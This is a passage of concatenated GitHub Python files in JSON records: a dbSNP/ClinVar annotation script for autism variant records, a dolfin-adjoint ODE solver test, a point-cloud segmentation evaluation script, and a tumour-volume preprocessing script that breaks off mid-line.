{\"POS\": doc[\"POS\"]}]})\n if cln_rec is None:\n doc[\"Clinvar ALLELEID\"] = \"-\"\n doc[\"Clinvar CLNSIG\"] = \"-\"\n doc[\"Clinvar CLNDN (Disease_Name)\"] = \"-\"\n doc[\"Clinvar CLNREVSTAT\"] = \"-\"\n doc[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = \"-\"\n else:\n clinvar_required_cols(doc, cln_rec)\n dbsnp_data_hg19.append(doc)\n count += 1\n\n else:\n del [doc[\"_id\"], doc[\"QUAL\"], doc[\"FILTER\"]]\n cln_rec = self.cln_col.find_one({\"$and\": [{\"CHROM\": doc[\"CHROM\"]}, {\"POS\": doc[\"POS\"]}]})\n if cln_rec is None:\n doc[\"Clinvar ALLELEID\"] = \"-\"\n doc[\"Clinvar CLNSIG\"] = \"-\"\n doc[\"Clinvar CLNDN (Disease_Name)\"] = \"-\"\n doc[\"Clinvar CLNREVSTAT\"] = \"-\"\n doc[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = \"-\"\n else:\n clinvar_required_cols(doc, cln_rec)\n dbsnp_data_hg19.append(doc)\n count += 1\n print(count)\n df = pd.DataFrame(dbsnp_data_hg19)\n df_dropDup = df.drop_duplicates(subset=[\"ID\", \"CHROM\", \"POS\"])\n fd = pd.DataFrame(dbsnp_data)\n fd_dropDup = fd.drop_duplicates()\n df_dropDup.to_csv(\"/home/bioinfo3/Desktop/databases/autism_records/autism-annotated-records-based_rsid.tsv\",\n sep=\"\\t\", index=False)\n print(df, fd)\n fd_dropDup.to_csv(\n \"/home/bioinfo3/Desktop/databases/autism_records/autism-Unannotated-records-based_rsid.tsv\",\n sep=\"\\t\", index=False)\n\n def chr_pos(self):\n # fetch the dbsnp records using chromosomes and positions...\n with open(self.input_file1, \"r\") as fh:\n header = fh.readline().strip().split(\"\\t\")\n c = 0\n data_fetched = []\n data_ntFetch = []\n for rows in fh:\n row = rows.strip().split(\"\\t\")\n # doc = self.col.find_one({\"$and\": [{\"CHROM\": \"chr\"+row[1]}, {\"POS\": int(row[2])}]})\n # print(doc)\n if row[2] == \"-\":\n pass\n else:\n doc = self.col.find_one({\"$and\": [{\"CHROM\": \"chr\" + row[1]}, {\"POS\": int(row[2])}]})\n if doc is None:\n data_ntFetch.append(row)\n else:\n 
cln_rec = self.cln_col.find_one({\"$and\": [{\"CHROM\": doc[\"CHROM\"]}, {\"POS\": doc[\"POS\"]}]})\n if cln_rec is None:\n doc[\"Clinvar ALLELEID\"] = \"-\"\n doc[\"Clinvar CLNSIG\"] = \"-\"\n doc[\"Clinvar CLNDN (Disease_Name)\"] = \"-\"\n doc[\"Clinvar CLNREVSTAT\"] = \"-\"\n doc[\"Clinvar MC (sequence_ontology | molecular_consequences)\"] = \"-\"\n else:\n clinvar_required_cols(doc, cln_rec)\n del [doc[\"_id\"], doc[\"QUAL\"], doc[\"FILTER\"]]\n data_fetched.append(doc)\n df = pd.DataFrame(data_fetched)\n fd = pd.DataFrame(data_ntFetch)\n df.to_csv(\"/home/bioinfo3/Desktop/databases/autism_records/autism-database-SNVchr_pos_fetched.tsv\",\n sep=\"\\t\",\n index=False)\n fd.to_csv(\"/home/bioinfo3/Desktop/databases/autism_records/autism-database-SNVchr_pos_ntfetch.tsv\",\n sep=\"\\t\",\n index=False)\n\n\nif __name__ == \"__main__\":\n cls = Mongo()\n cls.chr_pos()\n","repo_name":"ds121/data_analysis_scripts","sub_path":"dbsnpRecords_Using_chrPosRsID.py","file_name":"dbsnpRecords_Using_chrPosRsID.py","file_ext":"py","file_size_in_byte":6566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25571018166","text":"\ntry:\n from dolfin import BackwardEuler\nexcept ImportError:\n from dolfin import info_red\n info_red(\"Need dolfin > 1.2.0 for ode_solver test.\")\n import sys; sys.exit(0)\n\nfrom dolfin import *\nfrom dolfin_adjoint import *\n\nif not hasattr(MultiStageScheme, \"to_tlm\"):\n info_red(\"Need dolfin > 1.2.0 for ode_solver test.\")\n import sys; sys.exit(0)\n\nmesh = UnitIntervalMesh(1)\n#R = FunctionSpace(mesh, \"R\", 0) # in my opinion, should work, but doesn't\nR = FunctionSpace(mesh, \"CG\", 1)\n\ndef main(u, form, time, Solver, dt):\n\n scheme = Solver(form, u, time)\n scheme.t().assign(float(time))\n\n xs = [float(time)]\n ys = [u.vector().array()[0]]\n\n solver = PointIntegralSolver(scheme)\n solver.parameters.reset_stage_solutions = True\n solver.parameters.newton_solver.reset_each_step = True\n\n for i in range(int(0.2/dt)):\n solver.step(dt)\n xs.append(float(time))\n ys.append(u.vector().array()[0])\n\n return (u, xs, ys)\n\nif __name__ == \"__main__\":\n u0 = interpolate(Constant(1.0), R, name=\"InitialValue\")\n c_f = 1.0\n c = interpolate(Constant(1.0), R, name=\"GrowthRate\")\n Solver = RK4\n\n u = u0.copy(deepcopy=True, name=\"Solution\")\n v = TestFunction(R)\n time = Constant(0.0)\n # FIXME: make this work in the forward code:\n #expr = Expression(\"t\", t=time)\n #form = inner(expr(u, v)*dP\n form = lambda u, time: inner(time*u, v)*dP\n exact_u = lambda t: exp(t*t/2.0)\n #form = lambda u, time: inner(u, v)*dP\n #exact_u = lambda t: exp(t)\n\n ## Step 0. 
Check forward order-of-convergence (nothing to do with adjoints)\n check = False\n plot = False\n\n if check:\n if plot:\n import matplotlib.pyplot as plt\n\n dts = [0.1, 0.05, 0.025]\n\n errors = []\n for dt in dts:\n u.assign(u0)\n time.assign(0.0)\n adj_reset()\n (u, xs, ys) = main(u, form(u, time), time, Solver, dt=dt)\n\n exact_ys = [exact_u(t) for t in xs]\n errors.append(abs(ys[-1] - exact_ys[-1]))\n\n if plot:\n plt.plot(xs, ys, label=\"Approximate solution (dt %s)\" % dt)\n if dt == dts[-1]:\n plt.plot(xs, exact_ys, label=\"Exact solution\")\n\n print(\"Errors: \", errors)\n print(\"Convergence order: \", convergence_order(errors))\n\n assert min(convergence_order(errors)) > 0.8\n\n if plot:\n plt.legend(loc=\"best\")\n plt.show()\n else:\n dt = 0.1\n (u, xs, ys) = main(u, form(u, time), time, Solver, dt=dt)\n print(\"Solution: \", ys[-1])\n\n ## Step 1. Check replay correctness\n\n replay = True\n if replay:\n assert adjglobals.adjointer.equation_count > 0\n adj_html(\"forward.html\", \"forward\")\n success = replay_dolfin(tol=1.0e-15, stop=True)\n assert success\n\n ## Step 2. Check TLM correctness\n\n dtm = TimeMeasure()\n J = Functional(inner(u, u)*dx*dtm[FINISH_TIME])\n m = Control(u)\n assert m.tape_value().vector()[0] == u0.vector()[0]\n Jm = assemble(inner(u, u)*dx)\n\n def Jhat(ic):\n time = Constant(0.0)\n (u, xs, ys) = main(ic, form(ic, time), time, Solver, dt=dt)\n print(\"Perturbed functional value: \", assemble(inner(u, u)*dx))\n return assemble(inner(u, u)*dx)\n\n dJdm = compute_gradient_tlm(J, m, forget=False)\n minconv_tlm = taylor_test(Jhat, m, Jm, dJdm, perturbation_direction=interpolate(Constant(1.0), R), seed=1.0)\n assert minconv_tlm > 1.8\n\n ## Step 3. Check ADM correctness\n\n dJdm = compute_gradient(J, m, forget=False)\n minconv_adm = taylor_test(Jhat, m, Jm, dJdm, perturbation_direction=interpolate(Constant(1.0), R), seed=1.0)\n assert minconv_adm > 1.8\n","repo_name":"dolfin-adjoint/pyadjoint","sub_path":"tests/migration/ode_solver/ode_solver.py","file_name":"ode_solver.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"72"} +{"seq_id":"43580573641","text":"import os\nimport time\nimport random\nimport numpy as np\nimport argparse\nimport shutil\nimport time\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.multiprocessing as mp\nimport torch.distributed as dist\nfrom functools import partial\nfrom tensorboardX import SummaryWriter\n\nfrom pointseg.datasets import build_dataset\nfrom pointseg.model import build_model\nfrom pointseg.utils.misc import AverageMeter, intersection_and_union_gpu, find_free_port, make_dirs\nfrom pointseg.datasets.utils import collate_fn, point_collate_fn\nfrom pointseg.utils.optimizer import build_optimizer\nfrom pointseg.utils.scheduler import build_scheduler\nfrom pointseg.utils.losses import build_criteria\nfrom pointseg.utils.config import Config, DictAction\nfrom pointseg.utils.logger import get_root_logger\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='PyTorch Point Cloud Semantic Segmentation')\n parser.add_argument('config',\n type=str,\n default='configs/s3dis/ptv2-base-1.py',\n help='config file')\n parser.add_argument('--options', nargs='+', action=DictAction, help='custom options')\n args = parser.parse_args()\n return args\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n 
torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n cudnn.benchmark = False\n cudnn.deterministic = True\n\n\ndef worker_init_fn(worker_id, num_workers, rank, seed):\n \"\"\"Worker init func for dataloader.\n\n The seed of each worker equals to num_worker * rank + worker_id + user_seed\n\n Args:\n worker_id (int): Worker id.\n num_workers (int): Number of workers.\n rank (int): The rank of current process.\n seed (int): The random seed to use.\n \"\"\"\n\n worker_seed = num_workers * rank + worker_id + seed\n set_seed(worker_seed)\n\n\ndef main_process(cfg):\n return not cfg.multiprocessing_distributed or (\n cfg.multiprocessing_distributed and cfg.rank % cfg.num_gpus_per_node == 0)\n\n\ndef main():\n args = get_parser()\n\n cfg = Config.fromfile(args.config)\n if args.options is not None:\n cfg.merge_from_dict(args.options)\n\n if cfg.train_gpu is None:\n cfg.train_gpu = [int(i) for i in range(torch.cuda.device_count())]\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(str(x) for x in cfg.train_gpu)\n\n if cfg.seed is None:\n cfg.seed = random.randint(0, 2 ** 16)\n\n set_seed(cfg.seed)\n\n if cfg.dist_url == \"env://\" and cfg.world_size == -1:\n cfg.world_size = int(os.environ[\"WORLD_SIZE\"])\n\n cfg.distributed = cfg.world_size > 1 or cfg.multiprocessing_distributed\n cfg.num_gpus_per_node = len(cfg.train_gpu)\n if len(cfg.train_gpu) == 1:\n cfg.sync_bn = False\n cfg.distributed = False\n cfg.multiprocessing_distributed = False\n\n make_dirs(cfg.save_path)\n cfg.dump(os.path.join(cfg.save_path, \"config.py\"))\n\n if cfg.cache_data:\n build_dataset(cfg.data.train)\n build_dataset(cfg.data.val)\n\n if cfg.multiprocessing_distributed:\n port = find_free_port()\n cfg.dist_url = f\"tcp://localhost:{port}\"\n cfg.world_size = cfg.num_gpus_per_node * cfg.world_size\n mp.spawn(main_worker, nprocs=cfg.num_gpus_per_node, args=(cfg.num_gpus_per_node, cfg))\n else:\n main_worker(cfg.train_gpu, cfg.num_gpus_per_node, cfg)\n\n\ndef main_worker(gpu, num_gpus_per_node, cfg):\n best_metric = 0\n if cfg.distributed:\n if cfg.dist_url == \"env://\" and cfg.rank == -1:\n cfg.rank = int(os.environ[\"RANK\"])\n if cfg.multiprocessing_distributed:\n cfg.rank = cfg.rank * num_gpus_per_node + gpu\n dist.init_process_group(backend=cfg.dist_backend,\n init_method=cfg.dist_url,\n world_size=cfg.world_size,\n rank=cfg.rank)\n\n logger = get_root_logger(log_file=os.path.join(cfg.save_path, \"train.log\"), file_mode='a' if cfg.resume else 'w')\n logger.info(f\"Config:\\n{cfg.pretty_text}\")\n\n if cfg.seed is not None:\n seed = cfg.workers * cfg.rank + cfg.seed\n set_seed(seed)\n\n # build model\n logger.info(\"=> Creating model ...\")\n model = build_model(cfg.model)\n if cfg.sync_bn:\n model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\n n_parameters = sum(p.numel() for p in model.parameters() if p.requires_grad)\n logger.info(\"Number params: {}\".format(n_parameters))\n logger.info(\"Num classes: {}\".format(cfg.data.num_classes))\n\n writer = None\n if main_process(cfg):\n writer = SummaryWriter(cfg.save_path)\n\n if cfg.distributed:\n torch.cuda.set_device(gpu)\n cfg.batch_size = int(cfg.batch_size / num_gpus_per_node)\n cfg.batch_size_val = int(cfg.batch_size_val / num_gpus_per_node)\n cfg.workers = int((cfg.workers + num_gpus_per_node - 1) / num_gpus_per_node)\n model = torch.nn.parallel.DistributedDataParallel(\n model.cuda(),\n device_ids=[gpu],\n find_unused_parameters= False #True #cfg.find_unused_parameters\n )\n\n else:\n model = 
torch.nn.DataParallel(model.cuda())\n\n # build dataset & dataloader\n logger.info(\"=> Creating dataset & dataloader ...\")\n train_data = build_dataset(cfg.data.train)\n\n if cfg.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)\n else:\n train_sampler = None\n\n init_fn = partial(\n worker_init_fn, num_workers=cfg.workers, rank=cfg.rank,\n seed=cfg.seed) if cfg.seed is not None else None\n\n train_loader = torch.utils.data.DataLoader(train_data,\n batch_size=cfg.batch_size,\n shuffle=(train_sampler is None),\n num_workers=cfg.workers,\n sampler=train_sampler,\n collate_fn=partial(point_collate_fn,\n max_batch_points=cfg.max_batch_points,\n mix_prob=cfg.mix_prob\n ),\n pin_memory=True,\n worker_init_fn=init_fn,\n drop_last=True,\n persistent_workers=True)\n\n val_loader = None\n if cfg.evaluate:\n val_data = build_dataset(cfg.data.val)\n if cfg.distributed:\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_data)\n else:\n val_sampler = None\n val_loader = torch.utils.data.DataLoader(val_data,\n batch_size=cfg.batch_size_val,\n shuffle=False,\n num_workers=cfg.workers,\n pin_memory=True,\n sampler=val_sampler,\n collate_fn=collate_fn)\n\n # Build criteria, optimize, scheduler\n logger.info(\"=> Creating criteria, optimize, scheduler, scaler(amp) ...\")\n criteria = build_criteria(cfg.criteria)\n optimizer = build_optimizer(cfg.optimizer, model, cfg.param_dicts)\n cfg.scheduler.steps_per_epoch = len(train_loader)\n scheduler = build_scheduler(cfg.scheduler, optimizer)\n logger.info(\"Update steps_per_epoch to {}\".format(cfg.scheduler.steps_per_epoch))\n scaler = torch.cuda.amp.GradScaler() if cfg.enable_amp else None\n\n logger.info(\"=> Checking weight & resume ...\")\n resume_weight = ''\n logger.info(\"=> loading checkpoint '{}'\".format(resume_weight))\n checkpoint = torch.load(resume_weight, map_location=lambda storage, loc: storage.cuda())\n cfg.start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'], strict=True)\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(resume_weight, checkpoint['epoch']))\n\n for epoch in range(1):\n epoch_log = 0\n\n is_best = False\n \n if cfg.evaluate and (epoch_log % cfg.eval_freq == 0):\n loss_val, mIoU_val, mAcc_val, allAcc_val = \\\n validate(cfg, val_loader, model, criteria)\n current_metrics = dict(mIoU=mIoU_val, mAcc=mAcc_val, allAcc=allAcc_val) # register metrics\n\n logger.info('==>Evaluation done!\\nBest {}: {:.4f}'.format(cfg.metric, best_metric))\n if writer is not None:\n writer.close()\n\n\ndef validate(cfg, val_loader, model, criteria):\n logger = get_root_logger()\n logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')\n batch_time = AverageMeter()\n data_time = AverageMeter()\n loss_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n target_meter = AverageMeter()\n \n mh_weight = 1\n mh_dic = [19, -1, -1, 24, 23, 21, 20, 22]\n mh_dic_add = [0, 3, 4, 5, 6, 7]\n \n model.eval()\n end = time.time()\n for i, input_dict in enumerate(val_loader):\n data_time.update(time.time() - end)\n for key in input_dict.keys():\n if key != \"data_metas\":\n input_dict[key] = input_dict[key].cuda(non_blocking=True)\n coord = input_dict[\"coord\"]\n feat = input_dict[\"feat\"]\n target = input_dict[\"label\"]\n offset = input_dict[\"offset\"]\n mh = False\n \n with torch.no_grad():\n outputs = model(input_dict)\n\n\n if isinstance(outputs, tuple):\n mh = True\n outputs_c, outputs_b = outputs\n else:\n 
outputs_c = outputs\n if mh:\n targets_c = input_dict['label_c']\n targets_b = input_dict['label_b']\n if outputs_c.requires_grad:\n loss = criteria(outputs_c, targets_c) + mh_weight * criteria(outputs_b, targets_b)\n else:\n loss = criteria(outputs_c, targets_c)\n else:\n loss = criteria(outputs_c, target)\n\n if mh:\n output = outputs_c.max(1)[1]\n output_b = outputs_b.max(1)[1]\n for i_cat in range(6):\n output[np.logical_and((output == mh_dic_add[i_cat]).cpu().numpy(), (output_b == 1).cpu().numpy())] = mh_dic[mh_dic_add[i_cat]]\n else:\n output = outputs.max(1)[1]\n \n n = coord.size(0)\n if cfg.multiprocessing_distributed:\n loss *= n\n count = target.new_tensor([n], dtype=torch.long)\n dist.all_reduce(loss), dist.all_reduce(count)\n n = count.item()\n loss /= n\n\n # For fairness\n cur_length_point = input_dict['length'].data.cpu().numpy()\n cur_length_voxel = input_dict['count'].data.cpu().numpy()\n output1 = output[:cur_length_voxel[0]]\n cur_inverse_1 = input_dict['inverse'].data.cpu().numpy()[:cur_length_point[0]]\n main_points_1 = input_dict['main_num'].data.cpu().numpy()[0]\n output2 = output1[cur_inverse_1][:main_points_1]\n target2 = input_dict['main_label']\n\n intersection, union, target = \\\n intersection_and_union_gpu(output2, target2, cfg.data.num_classes, cfg.data.ignore_label)\n if cfg.multiprocessing_distributed:\n dist.all_reduce(intersection)\n dist.all_reduce(union)\n dist.all_reduce(target)\n intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()\n intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)\n\n accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)\n loss_meter.update(loss.item(), n)\n batch_time.update(time.time() - end)\n end = time.time()\n if (i + 1) % cfg.log_freq == 0:\n logger.info('Test: [{}/{}] '\n 'Data {data_time.val:.3f} ({data_time.avg:.3f}) '\n 'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '\n 'Loss {loss_meter.val:.4f} ({loss_meter.avg:.4f}) '\n 'Accuracy {accuracy:.4f}.'.format(i + 1, len(val_loader),\n data_time=data_time,\n batch_time=batch_time,\n loss_meter=loss_meter,\n accuracy=accuracy))\n\n iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)\n accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)\n mIoU = np.mean(iou_class)\n mAcc = np.mean(accuracy_class)\n allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)\n logger.info('Val result: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc))\n for i in range(cfg.data.num_classes):\n logger.info('Class_{idx}-{name} Result: iou/accuracy {iou:.4f}/{accuracy:.4f}'.format(\n idx=i, name=cfg.data.names[i], iou=iou_class[i], accuracy=accuracy_class[i]))\n logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')\n return loss_meter.avg, mIoU, mAcc, allAcc\n\n\nif __name__ == '__main__':\n import gc\n\n gc.collect()\n main()\n","repo_name":"CVMI-Lab/MarS3D","sub_path":"tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13693,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"29585232631","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom scipy import stats\nfrom argparse import ArgumentParser\nfrom utils import sort_timestamps, remove_surgery_patients, str2datetime,\\\n get_earliest_timestamp, get_last_timestamp, BCa_interval\n\n\ndef margins_of_error(data_path:str=None):\n data = 
pd.read_csv(os.path.join(data_path, \"interrater_variability_study.csv\"))\n\n raw = data[\"Raw volume\"]\n per = data[\"Per volume\"]\n\n error = np.abs(per - raw) / raw\n\n print(np.median(error), stats.iqr(error))\n print(np.mean(error), np.std(error))\n\n # find quantiles based data\n ci, theta_hat = BCa_interval(\n np.asarray(error), func=lambda x: np.mean(x), B=10000, q=0.975\n )\n\n print(ci)\n\n\ndef preprocess(data_path:str=None, remove_surgery:bool=False, export_csv:bool=False, remove_missing:bool=False, remove_multifocal:bool=False):\n cohort_personal_info = pd.read_csv(os.path.join(data_path, \"cohort_personal_info.csv\"))\n cohort_volumes_quality = pd.read_csv(os.path.join(data_path, \"cohort_volumes_quality-filtered.csv\"))\n volumes = pd.read_csv(os.path.join(data_path, \"volumes.csv\"))\n t2_oedema = pd.read_csv(os.path.join(data_path, \"T2_and_peritumorial_oedema.csv\"), sep=\";\")\n scanner_info = pd.read_csv(os.path.join(data_path, \"scanners_info.csv\"), sep=\",\")\n\n # get unique patients\n patients = cohort_personal_info[\"Patient\"]\n\n if remove_surgery:\n print(\"Filtering patients who underwent surgery...\")\n # remove all patients that have had surgery\n patients_no_surgery, patient_filter = remove_surgery_patients(patients)\n\n # filter other datasets by selected patients\n cohort_personal_info_filtered = cohort_personal_info[patient_filter]\n\n filter_ = [x in patients_no_surgery for x in cohort_volumes_quality[\"Patient\"]]\n filtered_cohort_volumes_quality = cohort_volumes_quality[filter_]\n\n filter_ = [x in patients_no_surgery for x in volumes[\"OP_ID\"]]\n filtered_volumes = volumes[filter_]\n\n filter_ = [x in patients_no_surgery for x in t2_oedema[\"Patient\"]]\n filtered_t2_oedema = t2_oedema[filter_]\n\n del patient_filter # to avoid using this variable by accident for something else later\n\n else:\n print(\"Keeping patients who underwent surgery...\")\n cohort_personal_info_filtered = cohort_personal_info.copy()\n filtered_cohort_volumes_quality = cohort_volumes_quality.copy()\n filtered_volumes = volumes.copy()\n filtered_t2_oedema = t2_oedema.copy()\n\n # 1) First assumption (lets sum all fragmented tumors together into one - total tumor volume in patient,\n # for each time point). 
Use cohort volumes quality to catch all patients and time points\n    data = []\n    unique_patients = np.asarray(filtered_volumes[\"OP_ID\"].drop_duplicates())\n    print(\"Number of unique patients originally:\", len(unique_patients))\n\n    iter = 0\n    for pat in tqdm(unique_patients, \"Extracting volume info per patient\"):\n        # get all data for current patient\n        curr_data = filtered_volumes[filtered_volumes[\"OP_ID\"] == pat]\n\n        # get unique timestamps\n        curr_timestamps = curr_data[\"Timestamp\"]\n        curr_timestamps = list(curr_timestamps)\n\n        unique_timestamps = np.unique(list(curr_timestamps))\n        unique_timestamps = sort_timestamps(unique_timestamps)\n\n        # get earliest timestamp with non-NaN or non-zero volume\n        for t in unique_timestamps:\n            tmp = curr_data[curr_data[\"Timestamp\"] == t]\n            curr_v = np.array(tmp[\"Volume\"]).astype(\"float32\")\n            curr_v = sum(curr_v)\n            if (curr_v != 0) and not pd.isnull(curr_v):\n                break\n        init_timestamp = t\n        # print(\"final timestamp (and size):\", init_timestamp, curr_v)\n\n        # get last timestamp with non-NaN volume\n        for t in unique_timestamps[::-1]: # reversed ordered timestamp list\n            tmp = curr_data[curr_data[\"Timestamp\"] == t]\n            curr_v = np.array(tmp[\"Volume\"]).astype(\"float32\")\n            curr_v = sum(curr_v)\n            if (curr_v != 0) and not pd.isnull(curr_v):\n                break\n        last_timestamp = t\n\n        # get date of first timestamp of patient (T1 might not be the earliest!! If T1 is NaN or 0, then T2 might be...)\n        first_timestamp_date = curr_data[curr_data[\"Timestamp\"] == init_timestamp][\"Date\"]\n        first_timestamp_date = str2datetime(np.asarray(first_timestamp_date)[0])\n\n        # get last timestamp\n        last_timestamp_date = curr_data[curr_data[\"Timestamp\"] == last_timestamp][\"Date\"]\n        last_timestamp_date = str2datetime(np.asarray(last_timestamp_date)[0])\n\n        # get initial volume size at first scan\n        initial_volume = curr_data[curr_data[\"Timestamp\"] == init_timestamp][\"Volume\"]\n        initial_volume = np.asarray(initial_volume)[0]\n\n        # get final volume size at last scan\n        last_volume = curr_data[curr_data[\"Timestamp\"] == last_timestamp][\"Volume\"]\n        last_volume = np.asarray(last_volume)[0]\n\n        # get relative volume change\n        relative_volume_change = (last_volume - initial_volume) / initial_volume\n\n        # get cluster numbers for current patient (if above 1, multifocal \"by definition\")\n        multifocality = int(np.any(curr_data[\"Clusters total\"] > 1))\n        clusters_total = max(curr_data[\"Clusters total\"])\n\n        # count number of timestamps\n        # nb_timestamps = len(curr_data[\"Timestamp\"])\n        nb_timestamps = len(unique_timestamps)\n\n        # for each time stamp, take all clusters and sum these into one value (total tumor amount in ml)\n        for timestamp in unique_timestamps:\n            # get volume for current timestamp - if multiple, sum these (total tumor volume)\n            times = curr_data[curr_data[\"Timestamp\"] == timestamp]\n            tmp = np.nan_to_num(times[\"Volume\"]) # convert NaN to 0 for summation\n            curr_volume = sum(list(tmp))\n\n            # get current date for timestamp - if multiple, select the first (should have same date for the same tumors in the same timestamp)\n            curr_dates = times[\"Date\"]\n            curr_dates = np.asarray(curr_dates)\n            curr_date = curr_dates[0]\n\n            # check if earliest timestamp, store categorical value\n            earliest_timestamp = int(timestamp == init_timestamp)\n\n            # translate current date to datetime format\n            curr_date = str2datetime(curr_date)\n\n            data.append([pat, timestamp, relative_volume_change, clusters_total, multifocality, earliest_timestamp,\n                         nb_timestamps, initial_volume, last_volume, 
first_timestamp_date,\n last_timestamp_date, curr_date, curr_volume])\n iter += 1\n\n data = np.array(data)\n\n # merge this with the cohort volumes quality stuff\n full_data = pd.DataFrame()\n\n full_data[\"Patient\"] = data[:, 0]\n full_data[\"Timestamp\"] = data[:, 1]\n full_data[\"Volume\"] = data[:, -1].astype(\"float32\")\n full_data[\"Date\"] = data[:, -2]\n full_data[\"Last_Timestamp_Date\"] = data[:, -3]\n full_data[\"First_Timestamp_Date\"] = data[:, -4]\n full_data[\"Final_Volume\"] = data[:, -5].astype(\"float32\")\n full_data[\"Initial_Volume\"] = data[:, -6].astype(\"float32\")\n full_data[\"Number_Of_Timestamps\"] = data[:, -7].astype(\"float32\")\n full_data[\"Earliest_Timestamp\"] = data[:, -8]\n full_data[\"Multifocality\"] = data[:, -9]\n full_data[\"Clusters_total\"] = data[:, -10]\n full_data[\"Relative_Volume_Change\"] = data[:, -11].astype(\"float32\")\n\n unique_patients = np.asarray(full_data[\"Patient\"].drop_duplicates())\n print(\"Number of unique patients in full_data:\", len(unique_patients))\n\n # initialize NaN rows in pandas dataframe for Volume data, which will be added\n full_data[\"Dim1\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Dim2\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Dim3\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Spacing1\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Spacing2\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Spacing3\"] = (np.nan * np.ones(full_data.shape[0]))\n \n # cannot simply stitch the two data arrays side by side, I will need to query\n # the (Patient, Timestamp) pairs\n for i in tqdm(range(full_data.shape[0]), \"Adding Quality info\"):\n curr_row = full_data.loc[i]\n \n curr_pat = str(curr_row[\"Patient\"])\n curr_timestamp = str(curr_row[\"Timestamp\"])\n\n filter_ = (filtered_cohort_volumes_quality[\"Patient\"] == curr_pat) & (filtered_cohort_volumes_quality[\"Timestamp\"] == curr_timestamp)\n\n if sum(filter_) != 1:\n print(sum(filter_))\n raise ValueError(\"More than one pat,ts pair matches between the two CSV files! 
Something is wrong!\")\n\n # query Volumes dataframe to find the patient + Timestamp pair\n row_id = np.where(filter_)[0][0]\n full_data.loc[i, \"Dim1\"] = filtered_cohort_volumes_quality.loc[row_id, \"Dim1\"]\n full_data.loc[i, \"Dim2\"] = filtered_cohort_volumes_quality.loc[row_id, \"Dim2\"]\n full_data.loc[i, \"Dim3\"] = filtered_cohort_volumes_quality.loc[row_id, \"Dim3\"]\n full_data.loc[i, \"Spacing1\"] = filtered_cohort_volumes_quality.loc[row_id, \"Spacing1\"]\n full_data.loc[i, \"Spacing2\"] = filtered_cohort_volumes_quality.loc[row_id, \"Spacing2\"]\n full_data.loc[i, \"Spacing3\"] = filtered_cohort_volumes_quality.loc[row_id, \"Spacing3\"]\n\n # add patient characteristics to full data frame\n full_data[\"Birth_Year\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Gender\"] = (np.nan * np.ones(full_data.shape[0]))\n for pat, gender, byear in tqdm(zip(cohort_personal_info_filtered[\"Patient\"], cohort_personal_info_filtered[\"Gender\"],\n cohort_personal_info_filtered[\"Birth_Year\"]), \"Adding patient info\", total=len(cohort_personal_info_filtered[\"Patient\"])):\n row_ids = np.where(full_data[\"Patient\"] == pat)[0]\n for r in row_ids:\n byear_new_format = str(byear) + \"-07-01\"\n byear_new_format = str2datetime(byear_new_format)\n\n full_data.loc[r, 'Birth_Year'] = byear_new_format\n full_data.loc[r, 'Gender'] = gender\n \n # convert gender to binary dummy variable (0: woman, 1: man), but keep old gender variable\n full_data[\"Gender_bin\"] = full_data[\"Gender\"].copy()\n full_data[\"Gender_bin\"].replace([\"woman\", \"man\"], [0, 1], inplace=True)\n\n # add T2 and oedema information to full data frame\n full_data[\"T2\"] = (np.nan * np.ones(full_data.shape[0]))\n full_data[\"Oedema\"] = (np.nan * np.ones(full_data.shape[0]))\n for patient in tqdm(filtered_t2_oedema[\"Patient\"], \"Adding T2 and Oedema info\"):\n row_ids = np.where(full_data[\"Patient\"] == patient)[0]\n curr = filtered_t2_oedema[filtered_t2_oedema[\"Patient\"] == patient]\n for r in row_ids:\n full_data.loc[r, \"T2\"] = np.array(curr[\"T2\"])\n full_data.loc[r, \"Oedema\"] = np.array(curr[\"peritumorial_oedema\"])\n\n # add scanner info to the full data frame\n full_data[\"Manufacturer\"] = (np.nan * np.ones(full_data.shape[0])).astype(str)\n full_data[\"Model_Name\"] = (np.nan * np.ones(full_data.shape[0])).astype(str)\n full_data[\"Tesla\"] = (np.nan * np.ones(full_data.shape[0]))\n for i in tqdm(range(len(scanner_info)), \"Adding scanner info\"):\n patient, timestamp, manufacturer, model_name, tesla = 